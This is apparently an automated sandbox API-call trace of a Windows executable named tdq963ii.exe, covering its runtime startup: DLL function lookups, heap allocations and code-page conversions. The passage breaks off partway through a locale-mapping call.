GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0248.453] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0248.453] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0248.453] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0248.453] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0248.453] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0248.453] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0248.453] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0248.453] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0248.454] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0248.454] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0248.454] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0248.454] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0248.454] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0248.454] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0248.454] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0248.454] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0248.454] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0248.454] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0248.454] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0248.454] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0248.454] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0248.455] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0248.455] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0248.455] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0248.455] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0248.455] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0248.455] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0248.455] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0248.455] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0248.455] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0248.455] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0248.455] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0248.455] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0248.456] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0248.456] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0248.456] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0248.456] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0248.456] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0248.456] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0248.456] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0248.456] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0248.456] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0248.456] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0248.456] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0248.456] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0248.456] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0248.457] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0248.457] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0248.457] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0248.457] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0248.457] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0248.457] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0248.457] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0248.457] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0248.457] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0248.457] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0248.457] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0248.457] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0248.458] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0248.458] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0248.458] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0248.458] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0248.458] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0248.458] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0248.458] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0248.458] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0248.458] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0248.458] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0248.458] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0248.459] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0248.459] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0248.459] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0248.459] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0248.460] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0248.460] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x49873d60, dwHighDateTime=0x1d68287)) [0248.460] GetCurrentThreadId () returned 0x150 [0248.460] GetCurrentProcessId () returned 0x644 [0248.460] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=36879917153) returned 1 [0248.460] GetProcessHeap () returned 0x520000 [0248.460] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0248.461] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0248.461] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0248.461] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0248.461] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0248.461] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0248.461] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0248.461] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0248.461] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0248.461] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0248.461] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0248.461] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0248.461] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0248.462] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0248.462] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0248.462] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0248.462] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0248.462] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0248.462] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0248.462] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0248.462] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0248.462] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0248.462] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0248.462] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0248.462] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0248.463] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0248.463] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0248.463] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0248.463] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0248.463] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0248.463] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0248.463] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0248.463] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0248.463] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0248.464] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x3bc) returned 0x537090 [0248.464] GetCurrentThreadId () returned 0x150 [0248.464] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x18) returned 0x537458 [0248.464] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x800) returned 0x537478 [0248.464] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0xde675826, hStdError=0x0)) [0248.464] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0248.464] GetFileType (hFile=0x3) returned 0x2 [0248.465] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.465] GetFileType (hFile=0x7) returned 0x2 [0248.465] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0248.465] GetFileType (hFile=0xb) returned 0x2 [0248.466] GetCommandLineW () returned="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" [0248.466] GetEnvironmentStringsW () returned 0x537c80* [0248.466] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xb7e) returned 0x538808 [0248.467] FreeEnvironmentStringsW (penv=0x537c80) returned 1 [0248.467] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0248.467] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x94) returned 0x537c80 [0248.467] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0xa0) returned 0x537d20 [0248.467] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x3e) returned 0x534dc0 [0248.467] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x6c) returned 0x537dc8 [0248.467] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x6e) returned 0x537e40 [0248.467] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x78) returned 0x52f8f0 [0248.467] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x62) returned 0x537eb8 [0248.467] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x2e) returned 0x537f28 [0248.467] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x48) returned 0x537f60 [0248.467] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x22) returned 0x537fb0 [0248.467] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x28) returned 0x537fe0 [0248.467] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x1a) returned 0x536a60 [0248.467] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x4a) returned 0x538010 [0248.467] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x72) returned 0x52f970 [0248.467] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x30) returned 0x538068 [0248.467] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x2e) returned 0x5380a0 [0248.467] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x1c) returned 0x536a88 [0248.467] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0xd2) returned 0x5380d8 [0248.467] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x7c) returned 0x5381b8 [0248.467] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x36) returned 0x538240 [0248.467] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x3a) returned 0x534e08 [0248.467] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x90) returned 0x538280 [0248.468] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x24) returned 0x538318 [0248.468] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x30) returned 0x538348 [0248.468] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x36) returned 0x538380 [0248.468] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x48) returned 0x5383c0 [0248.468] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x52) returned 0x538410 [0248.468] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x3c) returned 0x534e50 [0248.468] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x18) returned 0x538470 [0248.468] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x82) returned 0x538490 [0248.468] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x2e) returned 0x538520 [0248.468] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x1e) returned 0x536ab0 [0248.468] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x2c) returned 0x538558 [0248.468] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x54) returned 0x538590 [0248.468] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x52) returned 0x5385f0 [0248.468] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x2a) returned 0x538650 [0248.468] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x3c) returned 0x534e98 [0248.468] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x54) returned 0x538688 [0248.468] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x24) returned 0x5386e8 [0248.468] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x30) returned 0x538718 [0248.468] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x8c) returned 0x538750 [0248.468] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x538808 | out: hHeap=0x520000) returned 1 [0248.469] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x800) returned 0x5387e8 [0248.469] GetLastError () returned 0x0 [0248.469] SetLastError (dwErrCode=0x0) [0248.469] GetLastError () returned 0x0 [0248.469] SetLastError (dwErrCode=0x0) [0248.469] GetLastError () returned 0x0 [0248.469] SetLastError (dwErrCode=0x0) [0248.469] GetACP () returned 0x4e4 [0248.469] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x220) returned 0x538ff0 [0248.469] GetLastError () returned 0x0 [0248.469] SetLastError (dwErrCode=0x0) [0248.469] IsValidCodePage (CodePage=0x4e4) returned 1 [0248.470] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0248.470] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0248.470] GetLastError () returned 0x0 [0248.470] SetLastError (dwErrCode=0x0) [0248.470] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0248.470] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0248.470] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0248.470] GetLastError () returned 0x0 [0248.470] SetLastError (dwErrCode=0x0) [0248.470] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0248.470] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0248.470] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0248.470] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0248.470] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¶YgÞäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0248.470] GetLastError () returned 0x0 [0248.470] SetLastError (dwErrCode=0x0) [0248.470] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0248.470] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0248.471] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 